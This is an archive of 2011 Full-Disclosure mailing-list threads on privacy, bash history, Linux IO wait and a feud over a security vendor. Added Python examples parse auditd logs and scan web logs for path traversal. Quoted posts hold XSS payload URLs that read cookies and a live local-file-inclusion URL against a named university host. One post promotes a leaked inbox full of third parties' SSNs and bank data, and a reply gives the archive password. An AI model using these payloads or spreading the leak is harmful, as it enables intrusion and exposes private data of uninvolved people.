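                with open(os.path.join(task_dir, tid, "wchan")) as fh:
                    wchan = fh.read().strip() or "?"
            except OSError:
                wchan = "?"
            blocked[int(tid)] = (int(pid), comm, wchan)
    return blocked


def tally(samples):
    """Rank threads by the fraction of snapshots in which they were in state D.

    Returns rows of (share, tid, pid, comm, wchan), most-blocked first.
    """
    seen, info = Counter(), {}
    for snap in samples:
        for tid, meta in snap.items():
            seen[tid] += 1
            info[tid] = meta  # keep the most recent comm/wchan
    total = len(samples) or 1
    rows = [(seen[tid] / total, tid) + info[tid] for tid in seen]
    return sorted(rows, key=lambda r: (-r[0], r[1]))


def sample(count=20, interval=0.1, proc_root="/proc"):
    """Take `count` snapshots, `interval` seconds apart."""
    snaps = []
    for _ in range(count):
        snaps.append(snapshot(proc_root))
        time.sleep(interval)
    return snaps


if __name__ == "__main__":
    for share, tid, pid, comm, wchan in tally(sample()):
        print(f"{share:6.0%}  pid={pid} tid={tid} {comm}  wchan={wchan}")
```

A thread that shows up in every sample with the same wchan is a candidate for "truly stuck"; one that appears in a small share of samples is ordinary I/O.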

Re: [Full-disclosure] Best Buy and Privacy?

2011-02-07 Thread Cal Leeming [Simplicity Media Ltd]
Yeah, this technique is employed by many local police forces, in which they
encourage the sharing of information between agencies, and/or
communities/businesses. This isn't something that's going to get any easier,
and it's certainly not going to be stopped.

As a general rule of the thumb, you should always apply the "chain effect"
to these scenarios. This basically means, if *anything* other than cash is
exchanged when dealing with a business, then you have absolutely no control
over what happens to this information, despite laws being in place to
'protect' it. Try to think like a fraud investigator, what tricks would you
use to trace the steps of a purchase?

Slightly off subject but, the same logic applies to cell phones. Even if you
go into a store in another city, purchase a SIM with cash from an over the
counter corner shop with little CCTV, that SIM can still be tied back to you
based on 'trends' in your local area. This is why I always laugh when people
make a concerted effort to make sure as little information about them ends
up in the public domain, because it's really all much of a muchness. If
someone wants to find info on you, they will find it, one way or another
lol.

As a good friend once quoted to me: "Total paranoid is total awareness".




On Fri, Feb 4, 2011 at 7:31 PM, CSIRTTAC  wrote:

> And the turnaround at Gamestop would be a much better investment anyway.
> Usually you can get at least 10-20% off or up to 15 bucks or so on a new
> game with your trade-in's there vice turning them into BestBuy.
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of
> God)
> Sent: Friday, February 04, 2011 12:42 PM
> To: Paul Heinlein; Thor (Hammer of God)
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Best Buy and Privacy?
>
> No, that didn't come up at the time, but I wondered the same thing.   I've
> not heard of any rash of XBOX game thievery around, so my feeling is that
> it's practiced elsewhere, though I have no evidence of that.  The thing is,
> stealing a $50 game in order to get $5 or so at Best Buy isn't exactly an
> equitable model for theft, so none of it really makes too much sense to me.
>
> t
>
> >-Original Message-
> >From: Paul Heinlein [mailto:heinl...@madboa.com]
> >Sent: Friday, February 04, 2011 8:33 AM
> >To: Thor (Hammer of God)
> >Cc: full-disclosure@lists.grok.org.uk
> >Subject: Re: [Full-disclosure] Best Buy and Privacy?
> >
> >On Fri, 4 Feb 2011, Thor (Hammer of God) wrote:
> >
> >> I found this interesting, so I thought I would share it []
> >
> >It is interesting. Did you get a sense of whether the policy is specific to Seattle
> >/ King County / Washington?
> >
> >--
> >Paul Heinlein <> heinl...@madboa.com <> http://www.madboa.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Multiple vulnerabilities in SimpGB

2011-02-06 Thread Cal Leeming [Simplicity Media Ltd]
I think it's time for a group hug :|

On Sun, Feb 6, 2011 at 10:43 AM, Michele Orru wrote:

>  ahaah.
> Nice reply Sparky.
> MustLive, seems you've been defaced :-)
>
> antisnatchor
>
>  --
>
>laurent gaffie 
> February 5, 2011 3:36 AM
>
> Hey Sparky,
>
> One of the many many thing you didn't understand during the past 5 years is
> that you should probably try to identify and fix your stuff on *your*
> website, before spamming this ML with your crap.
> cf:
> http://www.zone-h.org/mirror/id/11367858
>
> e-tard.
>
>
> --
>
>MustLive 
> February 4, 2011 10:49 PM
>
> Hello Laurent!
>
> You are very "intelligent" man, as I see from this and previous your letter
> (in 2010).
>
> You need to take into account the next:
>
> 1. I know better where to send.
>
> 2. If you write shitty stuff, then it doesn't mean that other do the same.
>
> 3. No need to think and state instead of other people - if it's not
> interesting for you, then it can be interesting for others.
>
> 4. The main and obvious thing it's that I write all my advisories from 2006
> for those people who are interested in them (and there are such people, as I
> know for sure). So if you or anybody else is not interested in them, just
> skip them (and don't need to write me nonsenses) - I'm writing my letters
> not for you, but for others who is interested in them and who thanks me for
> my work. It's strange that such "intelligent" man as you didn't understand
> it for last five years :-).
>
> 5. I don't need any not serious letters from you, so don't waste your time
> writing me anymore, because I've put your e-mail into blacklist. Spend your
> time for good things.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> - Original Message -
> From: laurent gaffie
> To: MustLive
> Cc: full-disclosure@lists.grok.org.uk ; bugt...@securityfocus.com
> Sent: Wednesday, January 26, 2011 5:09 PM
> Subject: Re: [Full-disclosure] Multiple vulnerabilities in SimpGB
>
>
> Send your shitty stuff to bugt...@securityfocus.com
>
> If it's not obvious, no one give a shit here, seriously.
>
>
>
> 2011/1/27 MustLive 
>
> Hello list!
>
> I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
> Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.
>
> -
> Affected products:
> -
>
> Vulnerable are SimpGB v1.49.02 and previous versions.
>
> --
> Details:
> --
>
> XSS (WASC-08):
>
> POST request at page http://site/guestbook.php in parameters poster,
> postingid and location in Preview function. If captcha is using in
> guestbook, then working code of the captcha is required for the attack. Or
> via GET request:
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=11&preview=preview
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=11&preview=preview
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=11&preview=preview
>
> Brute Force (WASC-11):
>
> http://site/admin/index.php
>
> Insufficient Anti-automation (WASC-21):
>
> http://site/admin/pwlost.php
>
> In this functionality there is no protection from automated requests
> (captcha).
>
> Abuse of Functionality (WASC-42):
>
> http://site/admin/pwlost.php
>
> In this functionality it's possible to retrieve logins.
>
> 
> Timeline:
> 
>
> 2010.11.17 - announced at my site.
> 2010.11.19 - informed developers.
> 2011.01.25 - disclosed at my site.
>
> I mentioned about these vulnerabilities at my site
> (http://websecurity.com.ua/4690/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
>  --
>
>laurent gaffie 
> January 26, 2011 4:09 PM
>
> Send your shitty stuff to bugt...@securityfocus.com
>
> If it's not obvious, no one give a shit here, seriously.
>
>
>

Re: [Full-disclosure] encrypt the bash history

2011-02-06 Thread Cal Leeming [Simplicity Media Ltd]
This may/may not be relevant to your interests.

Me and a friend once stumbled across a lovely sys admin many years ago, that
patched bash to force it to log remotely (no I don't have the source).

Long story short, it got the desired effect that the sys admin was wanting
lol.

On Sun, Feb 6, 2011 at 9:17 PM, Zach C.  wrote:

> Pretty much what the others said with the addition that if you can't trust
> root, you simply cannot trust *any* command on that machine, including gpg,
> since root can compromise them in many ways, too. Best bet is to download it
> every session and clear it -- but be warned that even any method used to
> clear it can have a trap that secretly backs it up, however unlikely.
>
> Bottom line -- either trust root or don't use the machine. Those are your
> options if you feel paranoid enough that you don't want root always watching
> you.
>
> It's worth pointing out, by the way, that there are ways of watching your
> program executions without using your bash history, like auditd for example.
> In fact, I was able to write a script to parse auditd logs out to do just
> that in a really easy-to-read way -- "user (running as user2) ran
> /usr/bin/ssh with args: ssh user@host ..."
> On Feb 6, 2011 6:18 AM, "Emanuel dos Reis Rodrigues" <
> emanueldosr...@gmail.com> wrote:
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
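
Added example, not the script mentioned in the quoted reply: one way to turn auditd execve records into the one-line form quoted above, in Python. The log lines and the uid-to-name table are constructed samples, and the function names are this example's own.

```python
import re
import shlex

# Constructed records in the Linux audit log format (two execve events).
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1297030000.101:812): arch=c000003e syscall=59 success=yes exit=0 a0=1f3a2c0 a1=1f3a340 a2=1f39d10 a3=7ffd items=2 ppid=4100 pid=4177 auid=1000 uid=0 gid=0 euid=0 tty=pts0 ses=3 comm="ssh" exe="/usr/bin/ssh" key="exec"
type=EXECVE msg=audit(1297030000.101:812): argc=2 a0="ssh" a1="user@host"
type=SYSCALL msg=audit(1297030042.550:813): arch=c000003e syscall=59 success=yes exit=0 a0=2a a1=2b a2=2c a3=0 items=2 ppid=4100 pid=4180 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts0 ses=3 comm="grep" exe="/bin/grep" key="exec"
type=EXECVE msg=audit(1297030042.550:813): argc=3 a0="grep" a1=666F6F20626172 a2="/etc/passwd"
"""
SAMPLE_NAMES = {"0": "root", "1000": "alice"}  # constructed uid -> name table

EVENT_RE = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\):")
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
UNSET_AUID = {"4294967295", "-1"}  # login uid never set (e.g. daemons)


def decode_value(raw):
    """Audit strings are either "quoted" or, if they hold spaces or
    special bytes, written as bare hex. Undecodable input is returned as-is."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1]
    try:
        return bytes.fromhex(raw).decode("utf-8", "replace")
    except ValueError:
        return raw


def parse_events(log_text):
    """Join SYSCALL and EXECVE records that share one (timestamp, serial) id."""
    events = {}
    for line in log_text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        rtype, event_id = m.group(1), (m.group(2), m.group(3))
        fields = dict(FIELD_RE.findall(line[m.end():]))
        ev = events.setdefault(event_id, {})
        if rtype == "SYSCALL":
            # a0..a3 here are raw syscall arguments, not argv: ignore them.
            ev["auid"] = fields.get("auid", "?")
            ev["uid"] = fields.get("uid", "?")
            ev["exe"] = decode_value(fields.get("exe", ""))
        elif rtype == "EXECVE":
            argc = int(fields.get("argc", "0"))
            ev["argv"] = [decode_value(fields[f"a{i}"])
                          for i in range(argc) if f"a{i}" in fields]
    # Only events with both halves can be described.
    return [ev for ev in events.values() if "exe" in ev and "argv" in ev]


def user_name(uid, names):
    if uid in UNSET_AUID:
        return "unset"
    return names.get(uid, f"uid {uid}")


def describe(ev, names):
    """auid is who logged in; uid is who the process runs as (differs after su/sudo)."""
    login, running = user_name(ev["auid"], names), user_name(ev["uid"], names)
    who = login if login == running else f"{login} (running as {running})"
    args = " ".join(shlex.quote(a) for a in ev["argv"])
    return f"{who} ran {ev['exe']} with args: {args}"


def report(log_text, names):
    return [describe(ev, names) for ev in parse_events(log_text)]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_LOG, SAMPLE_NAMES)))
```

Because these records are written by the kernel audit subsystem rather than by the shell, clearing or encrypting the bash history does not affect them.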

[Full-disclosure] "IO wait chains" in Linux??

2011-02-06 Thread Cal Leeming [Simplicity Media Ltd]
So, the Windows based 'Resource Monitor' seems to have a neat little feature
called 'Wait chain', which lets you see which processes are currently stuck
waiting for IO.

Is anyone aware of a Linux based CLI equivalent, which will show the
processes stuck in IO wait, in a tree format? And before anyone decides to
give a smart ass answer (I'm looking at you Benji), no the 'iowait' tool
isn't what I'm talking about lol.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] An enemy of the infosec community needs to be brought to justice

2011-02-03 Thread Cal Leeming [Simplicity Media Ltd]
Lmao @ the password.

On Thu, Feb 3, 2011 at 11:58 PM, Justin Elze  wrote:

> The password is
>
> DoomedCharlatan
>
>
> Sent from my iPhone
>
> On Feb 3, 2011, at 6:48 PM, Hack Talk  wrote:
>
> Yea I'm waiting on this too. Post it up if you got it
>
>
> Luis Santana - Security+
> Administrator - http://hacktalk.net
> HackTalk Security - Security From The Underground
>
>
>
> On Thu, Feb 3, 2011 at 5:38 PM, Wesley Kerfoot <wja...@gmail.com> wrote:
>
>> where is the password for the archive?
>>
>> On Wed, Feb 2, 2011 at 1:19 PM, <gregorydev...@aim.com> wrote:
>>
>>> "Do not meddle in the affairs of hackers, for they are subtle and quick
>>> to anger"
>>>
>>> When one thinks of frauds in the infosec community, most people are
>>> quick to point to Gregory D Evans of LIGATT Security. He's been on TV,
>>> he's been on radio, he's trying to draw as much attention to himself as
>>> possible. This man in no way represents this industry
>>>
>>> Many people have done good work in trying to bring him down, and many
>>> of those people have put themselves directly in his line of fire. He's
>>> gone after people at their home to intimidate them and their family.
>>> He's gone after them at their work to discredit them with their
>>> employer. And as everyone knows, he recklessly sues anyone who speaks
>>> negatively of him on the internet.
>>>
>>> Enough is enough. He must be stopped by any means necessary. To that
>>> end, at the end of this message is a torrent of the inbox of
>>>  gregoryev...@ligatt.com; the only condition of
>>> receipt is that you not
>>> talk about the spool or this email release on twitter until after you
>>> have the full copy and are seeding it. He may be an idiot but his staff
>>> watch twitter for any mention of him, and it's imperative that this
>>> file be distributed as much as possible before takedown begins.
>>>
>>> This release immediately follows with a small regret. Apologies must be
>>> given to all the bystanders, innocent or otherwise. Contained within
>>> his inbox is personal information of many, many people. Social security
>>> numbers, bank account routing numbers, credit reports, and other
>>> reports by private investigators. It was completely impractical to
>>> redact all of this information in any effective manner, and for that:
>>> sadness. If in your search through this release you find personal
>>> information, please contact the person and notify them. Even when GDE
>>> finds out of this breach, it's quite unlikely that he will follow
>>> proper breach notification procedures.
>>>
>>> To the victims of Gregory Evans: please speak out. Defend yourself with
>>> the law. Your cause is righteous but he can only be brought to justice
>>> with your help. Don't stop fighting for integrity and truthfulness.
>>>
>>> To the employees and former employees of Gregory Evans: please speak
>>> out. We have read about the illegal treatment of you all; do not stand
>>> idly by. Talk to a lawyer about what he has subjected you to. Many of
>>> you have seen his illegal acts and some even asked to perform some on
>>> his behalf. This man is a con artist and will only continue to
>>> victimize people.
>>>
>>> To the partners and directors of Gregory Evans' many companies: shame
>>> on you. You took the easy way, following a crooked man in pursuit of
>>> money. Get out now while you still can. All that he has promised you
>>> will very soon disappear. If you decide to hang on, you will be brought
>>> down with him.
>>>
>>> To the brave soul who helped make this possible: thank you. You took
>>> great personal risk to bring this information forward, and none of it
>>> would be possible without you. It's unclear how you tolerate his lies
>>> day after day, but you've redeemed yourself by supporting this cause.
>>>
>>> Finally, to Gregory D Evans: it is done. All your lies are out in the
>>> open. Your investors will know. Your lawyers will know. Your employees
>>> will know. Your mother will know. Your lovers will know. Just step away
>>> and move on. Stop the stock scams. Stop the lawsuits. Stop the
>>> harassment. Stop robbing your employees. Stop embezzling. Stop
>>> deceiving every person in your life. When your child grows up and
>>> learns about you, the only legacy you'll be leaving is one of deception
>>> and fraud.
>>>
>>> Happy Birthday Mr. Evans
>>>  
>>> http://pastebin.com/raw.php?i=qA4fBYcG
>>> archive password will be released shortly
>>>
Re: [Full-disclosure] An enemy of the infosec community needs to be brought to justice

2011-02-02 Thread Cal Leeming [Simplicity Media Ltd]
ase...



Fact 19 Evans has one of the largest computer security news portal websites
in the world.  NationalCyberSecurity.com

*Christian Sciberras*: #19 - It all comes down to what the adjective,
"largest", is applied to. For instance, if it applied to "ugliness and hot
air", I'd wholeheartedly agree.



*Christian Sciberras*: #20 - Uh, no 20?!



On Thu, Feb 3, 2011 at 12:17 AM, bk  wrote:

>
> On Feb 2, 2011, at 3:01 PM, Cal Leeming [Simplicity Media Ltd] wrote:
>
> > How about you give some real examples of why he is considered to be a
> "fraud in the infosec community".
>
> Many interesting frauds here: http://attrition.org/errata/charlatan/
>
>
> --
> chort
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] An enemy of the infosec community needs to be brought to justice

2011-02-02 Thread Cal Leeming [Simplicity Media Ltd]
How about you give some real examples of why he is considered to be a "fraud
in the infosec community".

I know nothing of LIGATT security, nor this Gregory character, but one must
notice that the person who posted this thread, didn't even have the balls to
post using their real details. Or to quote a famous movie "I bet you'd f*ck
a guy in the ass and not even have the common decency to give him a reach
around".

Tbh, even if he is considered a fraud, that doesn't make him any different
than the majority of the asshats in the so called "infosec community", the
only difference is he has been on TV/Radio and thus has had more public
attention.


On Wed, Feb 2, 2011 at 6:19 PM,  wrote:

> "Do not meddle in the affairs of hackers, for they are subtle and quick
> to anger"
>
> When one thinks of frauds in the infosec community, most people are
> quick to point to Gregory D Evans of LIGATT Security. He's been on TV,
> he's been on radio, he's trying to draw as much attention to himself as
> possible. This man in no way represents this industry
>
> Many people have done good work in trying to bring him down, and many
> of those people have put themselves directly in his line of fire. He's
> gone after people at their home to intimidate them and their family.
> He's gone after them at their work to discredit them with their
> employer. And as everyone knows, he recklessly sues anyone who speaks
> negatively of him on the internet.
>
> Enough is enough. He must be stopped by any means necessary. To that
> end, at the end of this message is a torrent of the inbox of
> gregoryev...@ligatt.com; the only condition of receipt is that you not
> talk about the spool or this email release on twitter until after you
> have the full copy and are seeding it. He may be an idiot but his staff
> watch twitter for any mention of him, and it's imperative that this
> file be distributed as much as possible before takedown begins.
>
> This release immediately follows with a small regret. Apologies must be
> given to all the bystanders, innocent or otherwise. Contained within
> his inbox is personal information of many, many people. Social security
> numbers, bank account routing numbers, credit reports, and other
> reports by private investigators. It was completely impractical to
> redact all of this information in any effective manner, and for that:
> sadness. If in your search through this release you find personal
> information, please contact the person and notify them. Even when GDE
> finds out of this breach, it's quite unlikely that he will follow
> proper breach notification procedures.
>
> To the victims of Gregory Evans: please speak out. Defend yourself with
> the law. Your cause is righteous but he can only be brought to justice
> with your help. Don't stop fighting for integrity and truthfulness.
>
> To the employees and former employees of Gregory Evans: please speak
> out. We have read about the illegal treatment of you all; do not stand
> idly by. Talk to a lawyer about what he has subjected you to. Many of
> you have seen his illegal acts and some even asked to perform some on
> his behalf. This man is a con artist and will only continue to
> victimize people.
>
> To the partners and directors of Gregory Evans' many companies: shame
> on you. You took the easy way, following a crooked man in pursuit of
> money. Get out now while you still can. All that he has promised you
> will very soon disappear. If you decide to hang on, you will be brought
> down with him.
>
> To the brave soul who helped make this possible: thank you. You took
> great personal risk to bring this information forward, and none of it
> would be possible without you. It's unclear how you tolerate his lies
> day after day, but you've redeemed yourself by supporting this cause.
>
> Finally, to Gregory D Evans: it is done. All your lies are out in the
> open. Your investors will know. Your lawyers will know. Your employees
> will know. Your mother will know. Your lovers will know. Just step away
> and move on. Stop the stock scams. Stop the lawsuits. Stop the
> harassment. Stop robbing your employees. Stop embezzling. Stop
> deceiving every person in your life. When your child grows up and
> learns about you, the only legacy you'll be leaving is one of deception
> and fraud.
>
> Happy Birthday Mr. Evans
> http://pastebin.com/raw.php?i=qA4fBYcG
> archive password will be released shortly
>

Re: [Full-disclosure] Harvard.edu LFI

2011-01-31 Thread Cal Leeming [Simplicity Media Ltd]
Yup fixed. Can confirm that it was showing as vuln earlier tho.

On Mon, Jan 31, 2011 at 5:51 PM, Andrew Kirch  wrote:

> On 1/31/2011 12:39 PM, peter wrote:
>
> /../../../../../../../../../../../etc/passwd
>
> > Looks like it was fixed.
> fixed here too, check your browser cache
>

Re: [Full-disclosure] Vulnerability discloses PIN used in Microsoft Excel secure printing

2011-01-31 Thread Cal Leeming [Simplicity Media Ltd]
Wtf, I've never heard of a 'secure' print :S

On Mon, Jan 31, 2011 at 8:01 AM, Ed Murphy  wrote:

> Hello list,
>
> Stumbled across this today.  It appears Excel spreadsheets store
> printer information including the PIN you might use when trying to do
> a "secure" print.
>
>
> http://insecureprinting.com/Microsoft_Excel_Spreadsheets_Expose_User_PIN_Used_for_Confidential_Secure_Printing.pdf
>
> The paper is quite thorough and shows that in most cases the PIN is
> stored in clear text in the spreadsheet, though some printer vendors
> try to obfuscate the PIN (though not very successfully).
>
> Thanks,
> Ed
>

Re: [Full-disclosure] Harvard.edu LFI

2011-01-31 Thread Cal Leeming [Simplicity Media Ltd]
*claps*

On Mon, Jan 31, 2011 at 12:22 AM, Hack Talk  wrote:

> Hey,
>
> I've tried reporting issues to Harvard University tons of times in the past
> but they rarely respond and even more rarely commend researchers for finding
> vulnerabilities so I decided that full-disclosure was the way to get Harvard
> off of their crimson asses and patch this vulnerability.
>
> PoC link:
> http://www.hcs.harvard.edu/~chtnasp/index.php?page=../../../../../../../../../../../../../../../../../../../../../etc/passwd
>
> Enjoy,
>
> Luis Santana - Security+
> Administrator - http://hacktalk.net
> HackTalk Security - Security From The Underground
>
>
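The `page=` traversal in the PoC link above, seen from the log-review side. This is an added example, not part of the thread or any poster's code: it flags query-string values that climb above their starting directory, including percent-encoded and double-encoded forms. The log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [31/Jan/2011:00:20:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [31/Jan/2011:00:21:13 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1893',
    '203.0.113.9 - - [31/Jan/2011:00:22:40 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1893',
    '203.0.113.9 - - [31/Jan/2011:00:23:02 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 310',
    '192.0.2.44 - - [31/Jan/2011:00:25:10 +0000] "GET /index.php?page=docs/../faq HTTP/1.1" 200 4410',
    '192.0.2.44 - - [31/Jan/2011:00:26:55 +0000] "GET /index.php?page=..\\..\\boot.ini HTTP/1.1" 404 310',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def escapes_root(value):
    """True if the value, read as a relative path, climbs above where it started."""
    path = fully_decode(value).replace("\\", "/")
    depth = 0
    for part in path.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            depth -= 1
            if depth < 0:          # one more ".." than directories entered
                return True
        else:
            depth += 1
    return False


def scan(lines):
    """Return (client, parameter, decoded value, status) for each suspicious request."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target, status = match.group(1), int(match.group(2))
        try:
            query = urlsplit(target).query
        except ValueError:         # malformed request target; nothing to parse
            continue
        for name, value in parse_qsl(query, keep_blank_values=True):
            if escapes_root(value):
                findings.append((line.split()[0], name, fully_decode(value), status))
    return findings


def served(findings):
    """Traversal attempts answered with 200 are the ones to triage first."""
    return [f for f in findings if f[3] == 200]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

`docs/../faq` is deliberately not flagged: it contains `..` but never leaves its starting directory, which keeps the false-positive rate down on sites with relative links in parameters.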

Re: [Full-disclosure] http://security.goatse.fr/gaping-hole-exposed

2011-01-26 Thread Cal Leeming [Simplicity Media Ltd]
Lmao at the shout out to Harry Pearce ;p

On 27/01/2011 02:56, Ryan Sears wrote:
> ...and for those of you who didn't get the opportunity to read it before they 
> took it down, here's a mirror:
> http://i.imgur.com/0Yxgg.jpg
>
> Apparently goatse security weren't the only ones out for 'max lols' :-P
>
>
>
> - Original Message -
> From: "Andrew Kirch"
> To: "Full Disclosure"
> Sent: Wednesday, January 26, 2011 7:41:58 PM GMT -05:00 US/Canada Eastern
> Subject: [Full-disclosure] http://security.goatse.fr/gaping-hole-exposed
>
> RLY?
> YARLY.
>
> (wasn't me of course)
>


Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell

2011-01-26 Thread Cal Leeming [Simplicity Media Ltd]
Hi Juan,

Can you please confirm if your release of "Insect Pro 2.0" contains
any proprietary code that you or the development team have written (other than
the standard UI stuff). If so, can you elaborate on this further, and also
explain what makes this product unique?

Cheers

Cal

On Wed, Jan 26, 2011 at 4:59 AM, Juan Sacco  wrote:

> Steve, yes you can! :-)
>
> Let me know by email when you are ready! and I hope you could make a
> personal review of Insect Pro 2.0 when you get a copy :P
>
> BTW I will change that word "licence" is confusing I guess,
>
> Thanks for supporting our software
>
>
> Juan Sacco
>
> --
> _
> Insecurity Research - Security auditing and testing software
> Web: http://www.insecurityresearch.com
> Insect Pro 2.0 was released stay tuned
>
>
> On Wed, Jan 26, 2011 at 1:27 AM, Steve Pinkham wrote:
>
>> On 01/25/2011 10:06 PM, runlvl wrote:
>> > From our download section:
>> http://www.insecurityresearch.com/?page_id=926
>> >
>> > make a donation of minimum: $20 ( US Dollars )
>> >
>> > This helps us to maintain Insect Pro and the whole site!
>> >
>> > Steve,
>> >
>> > I'm sorry, we can't afford the project ( FTP bandwidth and HTTP server ),
>> > luckily a lot of people are trusting on us, so we can continue with this
>> > tool. Thumbs up! :-)
>> >
>> > Juan Sacco
>>
>> I repeat: If I'm just paying for download access, can I pay $20,
>> download it, then host it for others to download for free.  If not, it's
>> paying for licensing, not download bandwidth.  Also, I repeat, YOUR OWN
>> SITE says you are paying for a license, not download access.
>>
>> Quote from the page we both linked to:
>> > After you make the donation please write us an email to
>> > don...@insecurityresearch.com with your full name and we will send
>> > you the user and password for your new license.
>>
>> Put up or shut up time: I will pay to host the download on my own server
>> for the next 6 months if the product license allows it (and it's legal for
>> me to do so as not infringing copyright, etc), or you need to stop
>> claiming it is free.
>>
>> So, can I redistribute it for free, or are you a liar?
>>
>>
>>

Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell

2011-01-26 Thread Cal Leeming [Simplicity Media Ltd]
Lmao @ WTFPL. I'm gonna use that :D

On Wed, Jan 26, 2011 at 6:19 PM, Steve Pinkham wrote:

> On 01/26/2011 12:58 PM, Juan Sacco wrote:
> > The tool doesn't have any licence, we are using Python and Ruby. The
> > download size is 120mb
> >
> > Thanks for your interest!
> > Juan Sacco
> >
>
> OK, let's clarify the reasoning behind the questions:
>
> >> 1) What is the license?
> Under copyright law, I can't redistribute someone else's work without
> permission.  This permission is usually given in the form of a license
> grant of some sort. You can choose a open source license like BSD or
> GPL, or a freeware license grant, many examples of which can be found by
> searching the net for "freeware license".
>
> A simple "You may copy or distribute this software free of charge." or
> "This program may be freely distributed" is good enough in most locations.
>
> If you like being awesome(and who doesn't), you can try out the WTFPL.
> No better (and might be worse) than the simple statements above, but who
> cares? Isn't awesome the goal?
>
> http://sam.zoy.org/wtfpl/
>
> >> 2) What is included that you don't hold the copyright to?
> Much like the above, I need some legal reassurance that no one else can
> make copyright claims and sue me for infringement for hosting this
> download.  To verify this, I need to know who owns the copyrights for
> other software you have included, so I can verify your license is
> compatible with their license, and that I can distribute it legally.
>
> >> 3) What is the size of the download?
>
> This one was answered! That's 1 out of 3.. 2 more left for free hosting!
>
> Steve
> --
>  | Steven Pinkham, Security Consultant|
>  | http://www.mavensecurity.com   |
>  | GPG public key ID CD31CAFB |
>
>

Re: [Full-disclosure] "Hacker attacks won't hurt your company brand"

2011-01-21 Thread Cal Leeming [Simplicity Media Ltd]
It all depends what kind of breach happened.

Breaches caused by script kiddies and their automated kits, aren't exactly
very high profile, and usually come from poor security ethics surrounding
the infrastructure (i.e. lack of updates, no NIDS in place, no port
blocking, no IP whitelisting etc etc). Falling under this category would
certainly NOT be credible to the company, as it shows their security game is
piss poor.

Breaches caused by rogue internal staff members, or where the company has
been specifically targeted for a long play, would be the only circumstances
where the publicity could actually be beneficial, as it creates interesting
controversy, unlike the latter.

All the above is just my opinion though, not proven fact (although I've
headed up enough disaster recovery contracts after both ext and int breaches
to have a clear insight as to how these kinda things go down)

On Fri, Jan 21, 2011 at 11:02 AM, imipak  wrote:

> "...the idea that a breach is unlikely to kill your organization is
> spreading, because it’s backed by data."
>
> " If you’ve been spreading FUD [..] you’re going to face some harsh
> questions. By regularly making claims which turn out to be false, people
> undermine their credibility. If you’re one of those people, expect questions
> from those outside security who’ve heard you make the claim."
>
> "If you’re still doing it, you’re creating problems for yourself. Even
> worse, you’re creating problems for security professionals in general."
>
> (Adam Shostack,
> http://newschoolsecurity.com/2011/01/a-day-of-reckoning-is-coming/ )
>
>
> Anyone?
>
> -i
>

Re: [Full-disclosure] Path to IT Security

2011-01-20 Thread Cal Leeming [Simplicity Media Ltd]
Emmanuel, Can I also just say here, that being an expert in any area of IT
isn't about qualifications, it's a state of mind, a mentality. There are
thousand and thousands of people out there that call themselves "qualified
professionals", and for 99% of them, that's all they will ever be. If you've
got the passion, then you'll go far. :)

On Thu, Jan 20, 2011 at 5:37 PM, Georgi Guninski wrote:

> hi,
>
> to get an answer, how do you imagine your best case scenario for you in
> "the world of IT security (and/or) security professional"?
>
> basically describe your dreams on the matter to get an answer on this nice
> list.
>
> On Tue, Jan 18, 2011 at 04:10:48PM +, Emmanuel Apreko wrote:
> > Hello All,
> >
> > I'm a newbie to this list and all I need is some guidance into the world
> > of IT security. I have completed CompTIA A+ and Network+ and wish to pursue
> > a career in security.
> >
> > After researching I found out that the most prestigious security
